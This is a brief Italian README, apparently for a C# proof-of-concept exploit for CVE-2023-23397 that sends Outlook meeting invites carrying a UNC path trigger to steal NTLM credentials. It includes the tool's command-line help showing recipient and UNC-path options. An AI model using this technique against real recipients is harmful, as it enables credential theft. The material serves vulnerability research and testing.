
C# PoC exploit per CVE-2023-23397 che invia inviti di riunione di Outlook dannosi con un trigger del percorso UNC per il furto di credenziali NTLM.
Versione solo di invio in C# di CVE-2023-23397-POC-Powershell di Oddvar Moe (@oddvarmoe)
Invia email dall'indirizzo associato all'account Outlook.
.\CVE_2023_23397.exe --help
CVE_2023_23397 1.0.0.0
Copyright c 2023
-t, --to Required. Recipient email address
-p, --path Required. UNC Path
-s, --subject Message subject ("Testing New Exploit" if blank)
-b, --body Message body ("Here's your meeting invite" if blank)
--help Display this help screen.
--version Display version information.